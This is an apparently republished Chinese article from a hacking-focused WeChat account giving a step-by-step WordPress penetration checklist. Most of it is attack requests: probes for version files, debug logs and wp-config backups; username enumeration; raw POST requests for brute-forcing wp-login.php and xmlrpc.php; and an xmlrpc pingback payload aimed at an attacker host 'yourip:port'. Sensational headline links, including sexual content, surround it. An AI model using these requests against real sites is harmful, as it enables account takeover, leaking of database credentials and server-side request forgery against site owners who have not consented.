人民日报林治波社长发出灵魂拷问:你们是没有常识,还是没有良知?

惨烈的高峰防御战—“圣元春战役”打响!

母子乱伦:和儿子做了,我该怎么办?

一定在信仰的指导下抗击疫情《马克思主义信仰:战胜新冠肺炎疫情的内生力量》

2021年推特网黄Top10排行榜

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

干货 | Wordpress网站渗透方法指南

HACK学习 HACK学习呀 2022-11-02

如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?

如何挖掘Wordpress网站的漏洞

如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链接。

或者你可以访问https://target.com/wp-login.php,它是 WordPress 登录管理页面

通过查看核心、插件和主题版本找到相关的CVE

如何找到wordpress版本

https://target.com/feed https://target.com/?feed=rss2

如何找到插件版本

https://target.com/wp-content/plugins/PLUGINNAME/readme.txthttps://target.com/wp-content/plugins/PLUGINNAME/readme.TXThttps://target.com/wp-content/plugins/PLUGINNAME/README.txthttps://target.com/wp-content/plugins/PLUGINNAME/README.TXT

如何找到主题版本

https://target.com/wp-content/themes/THEMENAME/style.css https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)

如果您发现过时的核心/插件/主题,请在https://wpscan.com找到漏洞利用

查找日志文件

http://target.com/wp-content/debug.log

查找备份文件 wp-config

http://target.com/.wp-config.php.swphttp://target.com/wp-config.inchttp://target.com/wp-config.oldhttp://target.com/wp-config.txthttp://target.com/wp-config.htmlhttp://target.com/wp-config.php.bakhttp://target.com/wp-config.php.disthttp://target.com/wp-config.php.inchttp://target.com/wp-config.php.oldhttp://target.com/wp-config.php.savehttp://target.com/wp-config.php.swphttp://target.com/wp-config.php.txthttp://target.com/wp-config.php.ziphttp://target.com/wp-config.php.htmlhttp://target.com/wp-config.php~

获取网站上的用户名

http://target.com/?author=1

或者

http://target.com/wp-json/wp/v2/users http://target.com/?rest_route=/wp/v2/users

爆破后台账号密码

POST /wp-login.php HTTP/1.1Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1

或者

POST /xmlrpc.php HTTP/1.1Host: target.com
<?xml version="1.0" encoding="UTF-8"?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>BRUTEFORCE_IN_HERE</value></param> </params> </methodCall>

wordpress 中的 XSPA

POST /xmlrpc.php HTTP/1.1Host: target.com
<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://yourip:port</string></value></param><param><value><string>https://target.com></string></value></param></params></methodCall>

注册启用

http://example.com/wp-login.php?action=register

推荐阅读:

干货 | Office文档钓鱼之如何快速进行宏免杀

干货 | Github安全搬运工 2022年第十七期

实战 | 记一次渗透拿下某儿童色情网站的经过

干货 | 渗透中403/401页面绕过的思路总结

干货 | 2022最全宏病毒文件制作与防范指南

点赞,转发,在看

WordPress 性能优化:为什么我的博客比你的快
靶机打靶思路与方法
Spring Boot 配置文件这样加密,才足够安全!
高端操作!使用 SpingBoot 给你心爱的姑娘每日发一句浪漫情话~
同台服务器上多个 WordPress 站点怎么同时使用 Memcached

文章有问题?点此查看未经处理的缓存